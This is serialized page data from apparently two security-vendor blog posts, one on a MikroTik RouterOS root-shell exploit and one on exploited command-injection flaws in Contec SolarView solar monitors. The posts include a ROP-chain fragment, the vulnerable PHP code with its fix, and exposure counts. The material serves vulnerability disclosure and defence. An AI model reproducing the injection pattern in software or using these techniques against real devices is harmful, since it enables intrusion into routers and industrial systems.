",[886,93146,92475],{},", we opted to use a call via ",[886,93149,93038],{}," instead of calling it directly.",[1354,93152,93154],{"className":93047,"code":93153,"language":93049,"meta":219,"style":219},"0x00412480 \u003C+344>:    jal    0x4084a0 \u003Cdlopen@plt>\n0x00412484 \u003C+348>:    addiu    a0,a0,4\n",[886,93155,93156,93161],{"__ignoreMap":219},[1373,93157,93158],{"class":1375,"line":1376},[1373,93159,93160],{},"0x00412480 \u003C+344>:    jal    0x4084a0 \u003Cdlopen@plt>\n",[1373,93162,93163],{"class":1375,"line":220},[1373,93164,93165],{},"0x00412484 \u003C+348>:    addiu    a0,a0,4\n",[18,93167,93168],{},"Combined, they create a fairly simple ROP chain that results in loading the malicious shared object and sending a reverse shell to the attacker.",[61,93170,93172],{"id":93171},"detection-and-prevention","Detection and Prevention",[18,93174,93175],{},"As we’ve seen, exploitation of CVE-2023-30799 on hardware turned out to be quite easy. Given RouterOS’ long history of being an APT target, combined with the fact that FOISted was released well over a year ago, we have to assume we aren’t the first group to figure this out.",[18,93177,93178,93179,93183],{},"Under normal circumstances, we’d say detection of exploitation is a good first step to protecting your systems. Unfortunately, detection is nearly impossible. The RouterOS web and Winbox interfaces implement custom encryption schemes that neither Snort or Suricata can decrypt and inspect. Once an attacker is established on the device, they can easily make themselves invisible to the RouterOS UI. 
Microsoft ",[47,93180,22232],{"href":93181,"rel":93182},"https:\u002F\u002Fgithub.com\u002Fmicrosoft\u002Frouteros-scanner",[51]," a toolset that identifies potential malicious configuration changes, but configuration changes aren’t necessary when the attacker has root access to the system.",[18,93185,93186],{},"The best time to catch the attacker is during brute force attempts (if that approach is used) or when malicious ELF binaries are uploaded to the device. Although neither of those are specific to CVE-2023-30799.",[18,93188,93189],{},"Prevention is the best course of action. There are a few things administrators can do to protect themselves:",[1789,93191,93192,93195,93202,93205],{},[25,93193,93194],{},"Remove MikroTik administrative interfaces from the internet.",[25,93196,93197,93201],{},[47,93198,93200],{"href":93199},"%E2%80%8B%E2%80%8Bhttps:\u002F\u002Fwiki.mikrotik.com\u002Fwiki\u002FManual:Securing_Your_Router#Access_by_IP_address","Restrict"," which IP addresses administrators can login from.",[25,93203,93204],{},"Disable the Winbox and the web interfaces. Only use SSH for administration.",[25,93206,93207,93208,93213],{},"Configure SSH to use ",[47,93209,93212],{"href":93210,"rel":93211},"https:\u002F\u002Fwiki.mikrotik.com\u002Fwiki\u002FUse_SSH_to_execute_commands_(public\u002Fprivate_key_login)",[51],"public\u002Fprivate keys"," and disable passwords.",[18,93215,93216],{},"Otherwise, administrators should upgrade to 6.49.8 (stable) or the most recent 7.x stable.",[61,93218,202],{"id":201},[18,93220,93221,93222,93225,93226,93229,93230,93235],{},"VulnCheck’s interest in CVE-2023-30799 was the result of cross-team activities. 
Our ",[47,93223,42306],{"href":214,"rel":93224},[51]," team flagged the FOISted exploit, our ",[47,93227,91940],{"href":45535,"rel":93228},[51]," team wrote a new exploit, and our ",[47,93231,93234],{"href":93232,"rel":93233},"https:\u002F\u002Fvulncheck.com\u002Fadvisories\u002Freport",[51],"CNA team"," issued the CVE.",[18,93237,93238,93239,93243,93244,59],{},"If you are aware of an exploit that lacks an associated CVE, please ",[47,93240,93242],{"href":93232,"rel":93241},[51],"contact"," our CNA team to get a CVE assigned. We also encourage you to submit public exploits hosted on GitHub to ",[47,93245,83700],{"href":74248,"rel":93246},[51],[18,93248,93249],{},"If you are as interested in exploits as we are, register for a VulnCheck account today by clicking “Sign in \u002FRegister” and schedule a demo.",[2901,93251,93252],{},"",{"title":219,"searchDepth":220,"depth":220,"links":93254},[93255,93256,93257,93258,93259,93260],{"id":92301,"depth":220,"text":92302},{"id":92394,"depth":220,"text":92395},{"id":92419,"depth":220,"text":92420},{"id":93003,"depth":220,"text":93004},{"id":93171,"depth":220,"text":93172},{"id":201,"depth":220,"text":202},"VulnCheck develops an exploit that gets a root shell on MikroTik RouterOS.",{"slug":93263},"mikrotik-foisted-revisited","\u002Fblog\u002Fmikrotik-foisted-revisited",{"title":83451,"description":93261},"blog\u002Fmikrotik-foisted-revisited",[242],"yAEx4IWjBwlZkdOF8VY3HW0RDQSt4iNnKc1JKtIgnTY",{"id":93270,"title":93271,"articles":93272,"authors":93373,"body":93375,"date":93276,"description":95214,"extension":234,"image":7,"link":7,"meta":95215,"navigation":237,"path":95217,"seo":95218,"series":7,"stem":95219,"subtype":7,"tags":95220,"__hash__":95221},"blog\u002Fblog\u002Fsolarview-exploitation.md","Actively Exploited Industrial Control Systems Hardware - SolarView Series - Blog - VulnCheck",[93273,93277,93280,93283,93286,93290,93294,93297,93300,93304,93308,93311,93314,93318,93321,93324,93329,93333,93336,93339,93343,93346,93349,93353,93357,93361,93365,93369],{"title":93274,"source":85794,"link":93275,"date":93276},"Actively exploited vulnerability threatens hundreds of solar power stations","https:\u002F\u002Farstechnica.com\u002Fsecurity\u002F2023\u002F07\u002Factively-exploited-vulnerability-threatens-hundreds-of-solar-power-stations\u002F","2023-07-05",{"title":93278,"source":11218,"link":93279,"date":93276},"3 Critical RCE Bugs Threaten Industrial Solar Panels, Endangering Grid 
Systems","https:\u002F\u002Fwww.darkreading.com\u002Fics-ot\u002F3-critical-rce-bugs-threaten-industrial-solar-panels",{"title":93281,"source":12153,"link":93282,"date":93276},"Two-thirds of internet-facing SolarView systems still vulnerable to critical bug","https:\u002F\u002Fwww.scmagazine.com\u002Fnews\u002Fvulnerability-management\u002Fsolarview-systems-vulnerable-critical-bug",{"title":93284,"source":14378,"link":93285,"date":93276},"Exploited Solar Power Product Vulnerability Could Expose Energy Organizations to Attacks","https:\u002F\u002Fwww.securityweek.com\u002Fexploited-solar-power-product-vulnerability-could-expose-energy-organizations-to-attacks\u002F",{"title":93287,"source":14373,"link":93288,"date":93289},"Over 130,000 solar energy monitoring systems exposed online","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fover-130-000-solar-energy-monitoring-systems-exposed-online\u002F","2023-07-06",{"title":93291,"source":93292,"link":93293,"date":93289},"SolarView flaw exposes hundreds of solar farms","Cyber News","https:\u002F\u002Fcybernews.com\u002Fnews\u002Fsolarview-flaw-exposes-solar-farms\u002F",{"title":93295,"source":60946,"link":93296,"date":93289},"Photovoltaik-Monitoring: Sicherheitslücken in Solarview werden angegriffen","https:\u002F\u002Fwww.heise.de\u002Fnews\u002FPhotovoltaik-Monitoring-Sicherheitsluecken-in-Solarview-werden-angegriffen-9208511.html",{"title":93298,"source":19484,"link":93299,"date":93289},"Unpatched SolarView Systems Vulnerable to Exploits","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fsolarview-systems-vulnerable\u002F",{"title":93301,"source":93302,"link":93303,"date":93289},"Solar panel stations could fall prey to this devious security hack","MSN (TechRadar 
syndication)","https:\u002F\u002Fwww.msn.com\u002Fen-us\u002Fnews\u002Ftechnology\u002Fsolar-panel-stations-could-fall-prey-to-this-devious-security-hack\u002Far-AA1dweec?ocid=Peregrine",{"title":93305,"source":93306,"link":93307,"date":93289},"Threat actors quick to exploit proof-of-concept code","SC Media DailyScan newsletter","https:\u002F\u002Fpages.scmagazine.com\u002Findex.php\u002Femail\u002FemailWebview?md_id=14311",{"title":93309,"source":14390,"link":93310,"date":93289},"CVE-2022-29303 flaw in SolarView product can be exploited in attacks against the energy sector","https:\u002F\u002Fsecurityaffairs.com\u002F148216\u002Fhacking\u002Fsolarview-flaws-energy-sector.html",{"title":93301,"source":93312,"link":93313,"date":93289},"Tech Radar","https:\u002F\u002Fwww.techradar.com\u002Fpro\u002Fsolar-panel-stations-could-fall-prey-to-this-devious-security-hack",{"title":93315,"source":93316,"link":93317,"date":93289},"Hundreds of Solar Panels at Risk of Getting Hacked","Tech Times","https:\u002F\u002Fwww.techtimes.com\u002Farticles\u002F293514\u002F20230706\u002Fhundreds-solar-panels-risk-getting-hacked.htm",{"title":93319,"source":39566,"link":93320,"date":93289},"Nagoya port recovers from LockBit 3.0. Charming Kitten sighting. Spyware in Play store apps. 
Solar panel vulnerabilities.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F127",{"title":93301,"source":93322,"link":93323,"date":93289},"Yahoo (TechRadar syndication)","https:\u002F\u002Fwww.yahoo.com\u002Flifestyle\u002Fsolar-panel-stations-could-fall-141006706.html",{"title":93325,"source":93326,"link":93327,"date":93328},"Cyber Security Headlines:  Shell MOVEit breach, Pepsi bottler breach, INTERPOL nabs OPERA1ER","CISO Series, Cyber Security Headlines Podcast","https:\u002F\u002Fcisoseries.com\u002Fcyber-security-headlines-shell-moveit-breach-pepsi-bottler-breach-interpol-nabs-opera1er\u002F","2023-07-07",{"title":93330,"source":93331,"link":93332,"date":93328},"Hundreds of Solar Power Stations Are Running Software With Gaping Security Holes","ExtremeTech","https:\u002F\u002Fwww.extremetech.com\u002Finternet\u002Fhundreds-of-solar-power-stations-are-running-software-with-gaping-security",{"title":93334,"source":25672,"link":93335,"date":93328},"Critical RCE Bugs Expose Hundreds of Solar Power Stations","https:\u002F\u002Fgbhackers.com\u002Frce-bugs-solar-power-stations\u002F",{"title":93337,"source":12149,"link":93338,"date":93328},"VulnCheck detects remote command injection vulnerability in Contec SolarView series, affecting ICS hardware","https:\u002F\u002Findustrialcyber.co\u002Fvulnerabilities\u002Fvulncheck-detects-remote-command-injection-vulnerability-in-contec-solarview-series-affecting-ics-hardware\u002F",{"title":93340,"source":93341,"link":93342,"date":93328},"Security flaw threatens hundreds of solar power stations","MyBroadband","https:\u002F\u002Fmybroadband.co.za\u002Fnews\u002Fsecurity\u002F499153-security-flaw-threatens-hundreds-of-solar-power-stations.html",{"title":93344,"source":3494,"link":93345,"date":93328},"Risky Biz News: US and Canada warn of new Truebot malware 
variant","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-us-and-canada-warn?utm_source=post-email-title&publication_id=852612&post_id=133508363&isFreemail=true&utm_medium=email",{"title":93347,"source":23286,"link":93348,"date":93328},"Contec SolarView: Critical Bug Unpatched After 14 MONTHS","https:\u002F\u002Fsecurityboulevard.com\u002F2023\u002F07\u002Fcontec-solarview-unpatched-richixbw\u002F",{"title":93350,"source":93351,"link":93352,"date":93328},"Critical security vulnerabilities expose SolarView monitoring system on the open Internet","TechSpot","https:\u002F\u002Fwww.techspot.com\u002Fnews\u002F99306-critical-security-vulnerabilities-expose-solarview-monitoring-system-open.html",{"title":93354,"source":3481,"link":93355,"date":93356},"Liberté,Égalité, Spyware: France okays cops snooping on phones","https:\u002F\u002Fwww.theregister.com\u002F2023\u002F07\u002F10\u002Fin_brief_security\u002F","2023-07-10",{"title":93358,"source":92157,"link":93359,"date":93360},"IT’S ALIVE!, SLOW MIGRATIONS, HIDING ON THE NET, BLACKLOTUS SOURCE, & GASLIGHTING – PSW #790","https:\u002F\u002Fwww.scmagazine.com\u002Fpodcast-segment\u002Fits-alive-slow-migrations-hiding-on-the-net-blacklotus-source-gaslighting-psw-790","2023-07-12",{"title":93362,"source":93363,"link":93364,"date":93360},"The IT\u002FOT cultural divide in the federal space.","The CyberWire's Control Loop OT Cybersecurity Briefing podcast","https:\u002F\u002Fthecyberwire.com\u002Fpodcasts\u002Fcontrol-loop\u002F29\u002Fnotes",{"title":93366,"source":14373,"link":93367,"date":93368},"Fake Linux vulnerability exploit drops data-stealing malware","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Ffake-linux-vulnerability-exploit-drops-data-stealing-malware\u002F","2023-07-13",{"title":93370,"source":39566,"link":93371,"date":93372},"ControlLogix RCE exploit. Japan’s largest port disrupted by ransomware. Cl0p breaches Schneider Electric and Siemens Energy. 
Solar panel vulnerabilities.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fcontrol-loop\u002F2\u002F8","2023-08-02",[93374],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":93376,"toc":95212},[93377,93388,93407,93427,93430,93436,93439,93452,93796,93810,94136,94139,94145,94148,94169,94175,94178,94199,94205,94216,94675,94700,95146,95154,95163,95169,95172,95174,95186,95195,95198,95202,95209],[18,93378,93379,93380,93387],{},"On June 22, 2023, Palo Alto Networks Unit 42 published ",[1131,93381,93382],{},[47,93383,93386],{"href":93384,"rel":93385},"https:\u002F\u002Funit42.paloaltonetworks.com\u002Fmirai-variant-targets-iot-exploits\u002F",[51],"IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits",". The blog discusses a Mirai botnet variant using a handful of \"new\" CVEs to propagate.",[18,93389,93390,93391,93396,93397,93402,93403,93406],{},"One of the vulnerabilities was ",[47,93392,93395],{"href":93393,"rel":93394},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-29303",[51],"CVE-2022-29303",". CVE-2022-29303 is an unauthenticated and remote command injection vulnerability affecting the ",[47,93398,93401],{"href":93399,"rel":93400},"https:\u002F\u002Fwww.contec.com\u002Fproducts-services\u002Fenvironmental-monitoring\u002Fsolarview\u002F",[51],"Contec SolarView Series",".  Since VulnCheck ",[47,93404,42306],{"href":214,"rel":93405},[51]," has indexed a number of public exploits for SolarView, we decided to dig in and examine the potential scale and impact of this exploitation in the wild.",[18,93408,93409,93410,93415,93416,982,93421,93426],{},"To understand the potential impact, we first need to know what Contec SolarView is. SolarView monitors and visualizes small to medium-scale solar power generation and storage. 
Contec’s website ",[47,93411,93414],{"href":93412,"rel":93413},"https:\u002F\u002Fwww.contec.com\u002Fsolutions\u002Fenergy\u002F",[51],"advertises"," that the “SolarView brand … has been introduced at more than 30,000 power stations.” It also highlights deployment scenarios for ",[47,93417,93420],{"href":93418,"rel":93419},"https:\u002F\u002Fwww.contec.com\u002Fsolutions\u002Fenergy\u002Fsolutions\u002Fsolar-power\u002F",[51],"SolarView Air",[47,93422,93425],{"href":93423,"rel":93424},"https:\u002F\u002Fwww.contec.com\u002Fsolutions\u002Fenergy\u002Fsolutions\u002Fsolar-battery\u002F",[51],"SolarView Battery"," that depict the hardware being used in commercial buildings and solar power plants. Contec SolarView is clearly intended for ICS networks, so you’d hope to never find one accessible over the internet.",[18,93428,93429],{},"Shodan currently indexes more than 600 SolarView systems.",[18,93431,93432],{},[68,93433],{":width":10862,"alt":93434,"src":93435},"SolarView instances on Shodan","\u002Fblog\u002Fsolarview-exploitation\u002Fsolarview-shodan.png",[18,93437,93438],{},"Palo Alto Networks’ recent blog touches on the Mirai-variant abusing CVE-2022-29303. According to the CVE description, the affected versions of SolarView are “ver.6.00”. Version 6.00 was released in 2019, and SolarView Compact has seen four firmware releases since then (6.20 in 2019, 7.00 in 2021, 8.00 in 2022, and 8.10 in 2023).  That suggests that only a small subset of internet-facing hosts are likely to be vulnerable. However, further examination of SolarView’s firmware revealed that this CVE description is inaccurate.",[18,93440,93441,93442,93445,93446,93448,93449,93451],{},"CVE-2022-29303 affects the web server’s ",[886,93443,93444],{},"conf_mail.php"," endpoint, but version 6.20 (the version following the reportedly vulnerable 6.00) didn’t implement a fix for the issue. Not only was version 6.00 affected, but 6.20 as well.  
In fact, we found that the very straight-forward command injection in ",[886,93447,93444],{}," has existed since ",[1131,93450,54978],{}," version 4.00:",[1354,93453,93455],{"className":1367,"code":93454,"language":1369,"meta":219,"style":219},"if( isset($_REQUEST['button']) ){\n $button = $_REQUEST['button'];\n $mail_address = $_REQUEST['mail_address'];\n}\ninclude(\"include\u002FShowMsg.func\");\ninclude(\"include\u002Fcommon.def\");\n$TestMailLog = \"\u002Fvar\u002Flog\u002FSMail_test.log\";\n$CONFFILE = $ConfDataDir.\"\u002Ffws_mail.conf\";\n\nif( $button == $LABEL_SENDEXEC ){\n    $mail_address = str_replace( \" \",\"\", $mail_address );\n    if( strlen($mail_address) > 3 ){\n     $sendmes = \"SolarView\";\n     $exec_cmd = \"echo -1 \".$mail_address.\" TEST-MAIL '$sendmes' > \u002Fdev\u002Felogparam\";\n     system( $exec_cmd );\n     $status = 2;\n    }\n    else{\n     $status = 3;\n    }\n}\n",[886,93456,93457,93485,93508,93532,93536,93552,93567,93585,93610,93614,93633,93661,93682,93700,93741,93754,93766,93770,93776,93788,93792],{"__ignoreMap":219},[1373,93458,93459,93461,93463,93466,93468,93471,93473,93475,93478,93480,93482],{"class":1375,"line":1376},[1373,93460,4637],{"class":4636},[1373,93462,1384],{"class":1383},[1373,93464,93465],{"class":1379}," isset",[1373,93467,34467],{"class":1383},[1373,93469,93470],{"class":4640},"_REQUEST",[1373,93472,7035],{"class":1383},[1373,93474,1388],{"class":1387},[1373,93476,93477],{"class":1391},"button",[1373,93479,1388],{"class":1387},[1373,93481,48026],{"class":1383},[1373,93483,93484],{"class":1383}," ){\n",[1373,93486,93487,93489,93492,93494,93496,93498,93500,93502,93504,93506],{"class":1375,"line":220},[1373,93488,4656],{"class":1383},[1373,93490,93491],{"class":4640},"button 
",[1373,93493,5417],{"class":1397},[1373,93495,4656],{"class":1383},[1373,93497,93470],{"class":4640},[1373,93499,7035],{"class":1383},[1373,93501,1388],{"class":1387},[1373,93503,93477],{"class":1391},[1373,93505,1388],{"class":1387},[1373,93507,34699],{"class":1383},[1373,93509,93510,93512,93515,93517,93519,93521,93523,93525,93528,93530],{"class":1375,"line":1266},[1373,93511,4656],{"class":1383},[1373,93513,93514],{"class":4640},"mail_address ",[1373,93516,5417],{"class":1397},[1373,93518,4656],{"class":1383},[1373,93520,93470],{"class":4640},[1373,93522,7035],{"class":1383},[1373,93524,1388],{"class":1387},[1373,93526,93527],{"class":1391},"mail_address",[1373,93529,1388],{"class":1387},[1373,93531,34699],{"class":1383},[1373,93533,93534],{"class":1375,"line":1852},[1373,93535,1855],{"class":1383},[1373,93537,93538,93541,93543,93545,93548,93550],{"class":1375,"line":4692},[1373,93539,93540],{"class":4636},"include",[1373,93542,1384],{"class":1383},[1373,93544,183],{"class":1387},[1373,93546,93547],{"class":1391},"include\u002FShowMsg.func",[1373,93549,183],{"class":1387},[1373,93551,4680],{"class":1383},[1373,93553,93554,93556,93558,93560,93563,93565],{"class":1375,"line":4724},[1373,93555,93540],{"class":4636},[1373,93557,1384],{"class":1383},[1373,93559,183],{"class":1387},[1373,93561,93562],{"class":1391},"include\u002Fcommon.def",[1373,93564,183],{"class":1387},[1373,93566,4680],{"class":1383},[1373,93568,93569,93571,93574,93576,93578,93581,93583],{"class":1375,"line":4756},[1373,93570,4644],{"class":1383},[1373,93572,93573],{"class":4640},"TestMailLog ",[1373,93575,5417],{"class":1397},[1373,93577,4883],{"class":1387},[1373,93579,93580],{"class":1391},"\u002Fvar\u002Flog\u002FSMail_test.log",[1373,93582,183],{"class":1387},[1373,93584,4912],{"class":1383},[1373,93586,93587,93589,93592,93594,93596,93599,93601,93603,93606,93608],{"class":1375,"line":4768},[1373,93588,4644],{"class":1383},[1373,93590,93591],{"class":4640},"CONFFILE 
",[1373,93593,5417],{"class":1397},[1373,93595,4656],{"class":1383},[1373,93597,93598],{"class":4640},"ConfDataDir",[1373,93600,59],{"class":1397},[1373,93602,183],{"class":1387},[1373,93604,93605],{"class":1391},"\u002Ffws_mail.conf",[1373,93607,183],{"class":1387},[1373,93609,4912],{"class":1383},[1373,93611,93612],{"class":1375,"line":4792},[1373,93613,6520],{"emptyLinePlaceholder":237},[1373,93615,93616,93618,93620,93622,93624,93626,93628,93631],{"class":1375,"line":4798},[1373,93617,4637],{"class":4636},[1373,93619,1384],{"class":1383},[1373,93621,4656],{"class":1383},[1373,93623,93491],{"class":4640},[1373,93625,15920],{"class":1397},[1373,93627,4656],{"class":1383},[1373,93629,93630],{"class":4640},"LABEL_SENDEXEC ",[1373,93632,47430],{"class":1383},[1373,93634,93635,93637,93639,93641,93643,93645,93647,93649,93651,93653,93655,93657,93659],{"class":1375,"line":4806},[1373,93636,7362],{"class":1383},[1373,93638,93514],{"class":4640},[1373,93640,5417],{"class":1397},[1373,93642,34816],{"class":1379},[1373,93644,1384],{"class":1383},[1373,93646,4883],{"class":1387},[1373,93648,4883],{"class":1387},[1373,93650,5437],{"class":1383},[1373,93652,7083],{"class":1387},[1373,93654,5437],{"class":1383},[1373,93656,4656],{"class":1383},[1373,93658,93514],{"class":4640},[1373,93660,4680],{"class":1383},[1373,93662,93663,93665,93667,93670,93672,93674,93676,93678,93680],{"class":1375,"line":4817},[1373,93664,4695],{"class":4636},[1373,93666,1384],{"class":1383},[1373,93668,93669],{"class":1379}," strlen",[1373,93671,34467],{"class":1383},[1373,93673,93527],{"class":4640},[1373,93675,2230],{"class":1383},[1373,93677,11741],{"class":1397},[1373,93679,55838],{"class":5467},[1373,93681,93484],{"class":1383},[1373,93683,93684,93686,93689,93691,93693,93696,93698],{"class":1375,"line":4825},[1373,93685,35280],{"class":1383},[1373,93687,93688],{"class":4640},"sendmes 
",[1373,93690,5417],{"class":1397},[1373,93692,4883],{"class":1387},[1373,93694,93695],{"class":1391},"SolarView",[1373,93697,183],{"class":1387},[1373,93699,4912],{"class":1383},[1373,93701,93702,93704,93707,93709,93711,93714,93716,93718,93720,93722,93724,93726,93729,93731,93734,93737,93739],{"class":1375,"line":4835},[1373,93703,35280],{"class":1383},[1373,93705,93706],{"class":4640},"exec_cmd ",[1373,93708,5417],{"class":1397},[1373,93710,4883],{"class":1387},[1373,93712,93713],{"class":1391},"echo -1 ",[1373,93715,183],{"class":1387},[1373,93717,59],{"class":1397},[1373,93719,4644],{"class":1383},[1373,93721,93527],{"class":4640},[1373,93723,59],{"class":1397},[1373,93725,183],{"class":1387},[1373,93727,93728],{"class":1391}," TEST-MAIL '",[1373,93730,4644],{"class":1383},[1373,93732,93733],{"class":4640},"sendmes",[1373,93735,93736],{"class":1391},"' > \u002Fdev\u002Felogparam",[1373,93738,183],{"class":1387},[1373,93740,4912],{"class":1383},[1373,93742,93743,93746,93748,93750,93752],{"class":1375,"line":4843},[1373,93744,93745],{"class":1379},"     
system",[1373,93747,1384],{"class":1383},[1373,93749,4656],{"class":1383},[1373,93751,93706],{"class":4640},[1373,93753,4680],{"class":1383},[1373,93755,93756,93758,93760,93762,93764],{"class":1375,"line":4849},[1373,93757,35280],{"class":1383},[1373,93759,47671],{"class":4640},[1373,93761,5417],{"class":1397},[1373,93763,5499],{"class":5467},[1373,93765,4912],{"class":1383},[1373,93767,93768],{"class":1375,"line":4877},[1373,93769,4795],{"class":1383},[1373,93771,93772,93774],{"class":1375,"line":4915},[1373,93773,7643],{"class":4636},[1373,93775,8904],{"class":1383},[1373,93777,93778,93780,93782,93784,93786],{"class":1375,"line":4931},[1373,93779,35280],{"class":1383},[1373,93781,47671],{"class":4640},[1373,93783,5417],{"class":1397},[1373,93785,55838],{"class":5467},[1373,93787,4912],{"class":1383},[1373,93789,93790],{"class":1375,"line":4947},[1373,93791,4795],{"class":1383},[1373,93793,93794],{"class":1375,"line":4952},[1373,93795,1855],{"class":1383},[18,93797,93798,93799,93801,93802,93805,93806,93809],{},"It wasn’t until version 8.00 that ",[886,93800,93444],{}," was added to the ",[886,93803,93804],{},"auth.require"," list, and validation is added to the attacker-controlled ",[886,93807,93808],{},"$mail_address"," variable.",[1354,93811,93813],{"className":1367,"code":93812,"language":1369,"meta":219,"style":219},"if( isset($_REQUEST['button']) ){\n    $button = $_REQUEST['button'];\n    $mail_address = EscStr($_REQUEST['mail_address']);\n    $mail_address = str_replace(\" \",\"\",$mail_address);\n    $address_array = explode(\",\", $mail_address);\n    $mail_address = \"\";\n    $cnt = 0;\n    for( $i = 0 ; $i \u003C sizeof($address_array) ; $i++ ){\n     if( filter_var($address_array[$i], FILTER_VALIDATE_EMAIL) ){\n      if( $cnt == 0 ){\n       $mail_address = $address_array[$i];\n      }\n      else{\n       $mail_address .= \",\".$address_array[$i];\n      }\n      $cnt++;\n     }\n    
}\n}\n",[886,93814,93815,93839,93861,93886,93912,93940,93952,93965,94009,94036,94052,94070,94074,94081,94107,94111,94123,94128,94132],{"__ignoreMap":219},[1373,93816,93817,93819,93821,93823,93825,93827,93829,93831,93833,93835,93837],{"class":1375,"line":1376},[1373,93818,4637],{"class":4636},[1373,93820,1384],{"class":1383},[1373,93822,93465],{"class":1379},[1373,93824,34467],{"class":1383},[1373,93826,93470],{"class":4640},[1373,93828,7035],{"class":1383},[1373,93830,1388],{"class":1387},[1373,93832,93477],{"class":1391},[1373,93834,1388],{"class":1387},[1373,93836,48026],{"class":1383},[1373,93838,93484],{"class":1383},[1373,93840,93841,93843,93845,93847,93849,93851,93853,93855,93857,93859],{"class":1375,"line":220},[1373,93842,7362],{"class":1383},[1373,93844,93491],{"class":4640},[1373,93846,5417],{"class":1397},[1373,93848,4656],{"class":1383},[1373,93850,93470],{"class":4640},[1373,93852,7035],{"class":1383},[1373,93854,1388],{"class":1387},[1373,93856,93477],{"class":1391},[1373,93858,1388],{"class":1387},[1373,93860,34699],{"class":1383},[1373,93862,93863,93865,93867,93869,93872,93874,93876,93878,93880,93882,93884],{"class":1375,"line":1266},[1373,93864,7362],{"class":1383},[1373,93866,93514],{"class":4640},[1373,93868,5417],{"class":1397},[1373,93870,93871],{"class":7297}," 
EscStr",[1373,93873,34467],{"class":1383},[1373,93875,93470],{"class":4640},[1373,93877,7035],{"class":1383},[1373,93879,1388],{"class":1387},[1373,93881,93527],{"class":1391},[1373,93883,1388],{"class":1387},[1373,93885,34850],{"class":1383},[1373,93887,93888,93890,93892,93894,93896,93898,93900,93902,93904,93906,93908,93910],{"class":1375,"line":1852},[1373,93889,7362],{"class":1383},[1373,93891,93514],{"class":4640},[1373,93893,5417],{"class":1397},[1373,93895,34816],{"class":1379},[1373,93897,1384],{"class":1383},[1373,93899,183],{"class":1387},[1373,93901,4883],{"class":1387},[1373,93903,5437],{"class":1383},[1373,93905,7083],{"class":1387},[1373,93907,47335],{"class":1383},[1373,93909,93527],{"class":4640},[1373,93911,4680],{"class":1383},[1373,93913,93914,93916,93919,93921,93924,93926,93928,93930,93932,93934,93936,93938],{"class":1375,"line":4692},[1373,93915,7362],{"class":1383},[1373,93917,93918],{"class":4640},"address_array ",[1373,93920,5417],{"class":1397},[1373,93922,93923],{"class":1379}," explode",[1373,93925,1384],{"class":1383},[1373,93927,183],{"class":1387},[1373,93929,5437],{"class":1391},[1373,93931,183],{"class":1387},[1373,93933,5437],{"class":1383},[1373,93935,4656],{"class":1383},[1373,93937,93527],{"class":4640},[1373,93939,4680],{"class":1383},[1373,93941,93942,93944,93946,93948,93950],{"class":1375,"line":4724},[1373,93943,7362],{"class":1383},[1373,93945,93514],{"class":4640},[1373,93947,5417],{"class":1397},[1373,93949,16579],{"class":1387},[1373,93951,4912],{"class":1383},[1373,93953,93954,93956,93959,93961,93963],{"class":1375,"line":4756},[1373,93955,7362],{"class":1383},[1373,93957,93958],{"class":4640},"cnt 
",[1373,93960,5417],{"class":1397},[1373,93962,5557],{"class":5467},[1373,93964,4912],{"class":1383},[1373,93966,93967,93969,93971,93973,93976,93978,93980,93982,93984,93986,93988,93991,93993,93996,93998,94000,94002,94004,94007],{"class":1375,"line":4768},[1373,93968,63770],{"class":4636},[1373,93970,1384],{"class":1383},[1373,93972,4656],{"class":1383},[1373,93974,93975],{"class":4640},"i ",[1373,93977,5417],{"class":1397},[1373,93979,5557],{"class":5467},[1373,93981,57171],{"class":1383},[1373,93983,4656],{"class":1383},[1373,93985,93975],{"class":4640},[1373,93987,11852],{"class":1397},[1373,93989,93990],{"class":1379}," sizeof",[1373,93992,34467],{"class":1383},[1373,93994,93995],{"class":4640},"address_array",[1373,93997,2230],{"class":1383},[1373,93999,57171],{"class":1383},[1373,94001,4656],{"class":1383},[1373,94003,49188],{"class":4640},[1373,94005,94006],{"class":1397},"++",[1373,94008,93484],{"class":1383},[1373,94010,94011,94013,94015,94018,94020,94022,94025,94027,94029,94032,94034],{"class":1375,"line":4792},[1373,94012,78732],{"class":4636},[1373,94014,1384],{"class":1383},[1373,94016,94017],{"class":1379}," filter_var",[1373,94019,34467],{"class":1383},[1373,94021,93995],{"class":4640},[1373,94023,94024],{"class":1383},"[$",[1373,94026,49188],{"class":4640},[1373,94028,27625],{"class":1383},[1373,94030,94031],{"class":52039}," 
Suffice to say, the range of affected systems is much wider than the CVE description lets on, and thanks to a copyright string on the landing page (and the sparse number of releases over the years), we can easily fingerprint the affected internet-facing systems.

![Vulnerable SolarView instances on Shodan](/blog/solarview-exploitation/shodan-affected.png)

It turns out that less than one third of the internet-facing SolarView series systems are patched against CVE-2022-29303.

Additionally, Unit 42’s blog wasn’t even the first indication that the vulnerability was being exploited in the wild. CVE-2022-29303 has had an [Exploit-DB entry](https://www.exploit-db.com/exploits/50940) since May 2022. GreyNoise [mentioned](https://www.greynoise.io/blog/trinity-cyber-sharing-intelligence-protect-internet-citizens) the vulnerability in a blog in May 2023. And a [YouTube video](https://www.youtube.com/watch?v=vFo1XETreCs) from May 2022 shows an attacker using the Exploit-DB exploit against a SolarView system found on Shodan (why one would post their crimes to YouTube, I’ll never know).

![Exploitation of SolarView on YouTube](/blog/solarview-exploitation/youtube-crimes.png)

It gets worse. While CVE-2022-29303 has garnered attention from some organizations like Unit 42 and GreyNoise, there are a couple of other unauthenticated RCEs affecting the systems that have not.

[CVE-2023-23333](https://nvd.nist.gov/vuln/detail/CVE-2023-23333) affects the SolarView series up to version 8.00 (despite the fact that the CVE description says “through 6.0”). This vulnerability doesn’t have any Exploit-DB entries, but it has proof-of-concept exploits on GitHub ([Timorlover](https://github.com/Timorlover/CVE-2023-23333), [Mr-xn](https://github.com/Mr-xn/CVE-2023-23333), [WhiteOwl-Pub](https://github.com/WhiteOwl-Pub/PoC-SolarView-Compact-CVE-2023-23333)).

![downloader.php exploit](/blog/solarview-exploitation/downloader-exploit.png)

